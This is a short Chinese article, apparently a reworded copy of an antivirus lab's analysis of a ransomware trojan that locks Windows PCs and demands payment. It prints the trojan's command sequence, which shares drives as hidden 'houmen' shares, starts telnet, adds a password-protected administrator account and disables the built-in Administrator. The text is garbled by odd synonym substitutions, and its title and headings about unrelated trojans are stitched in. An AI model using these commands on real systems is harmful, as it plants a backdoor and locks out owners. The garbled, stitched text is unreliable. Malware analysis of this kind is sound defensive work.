锁定手机的神经猫爆分工具分析
【文章摘要】 克日,腾讯反病毒实验室通过伪装成免费领取来捕捉勒索木马QB文件在网络社交工具、网络共享板、下载站流传。克日,腾讯反病毒实验室通过伪装成免费领取来捕捉勒索木马QB文件在网络社交工具、网络共享磁盘和下载站流传。一旦用户下载并运行,将导致计算机无法进入系统、个人隐私泄露、磁盘文件被盗、系统损坏等安全风险。
关于QQ粘虫盗号木马详细分析
据平安专家介绍,勒索木马运行后,将禁止当前账户、建立新用户、设置密码、设置访客账户密码、禁止义务管理器、隐藏桌面图标和义务栏、共享磁盘、启动远程登录服务。此外,木马还将在窗口留下支付方式,要求用户支付购买启动密码,给用户造成财产损失。
让我们来看看木马的详细分析。
1、修改注册表禁用义务管理器
2、隐藏义务栏
3、隐藏桌面图标
4、下令依次执行,损坏系统
netsharehoumen$=c:\\将c盘设置为共享,并将共享命名为houmen
netsharehoumen2$=d:\\将d盘设置为共享,并将共享命名为houmen2
netstarttelnet启动telnet服务
netstartServer启动Server服务
netuserForbidden1207142187/add新用户并设置密码
netuserForbidden/active:yes启用刚刚建立的用户
netlocalgroupAdministratorsForbidden/add管理员将新建立的账户设置为管理员
netuserAdministrator/active:no禁用名为Administrator的账户
tsshutdn关机
dfrg.msc-无效下令
syskey打开帐户数据库加密程序
iexpress打开IExpress建立自解压文件
Nslookup查看DNS服务器地址
netsharec$/del关闭C盘默认共享
netstop无效下令
netuserguest12345将guset帐户密码设置为12345
netpassword无效下令
iisreset/enable启动IIS服务
iisreset/rebootonerror设置IIS:如果发送错误,重启计算机
5、窗口内容如下:主要功能是要求用户联系对方并支付赎金。
6、现在电脑管家可以用来杀死木马
高危病毒木马黑狐深入分析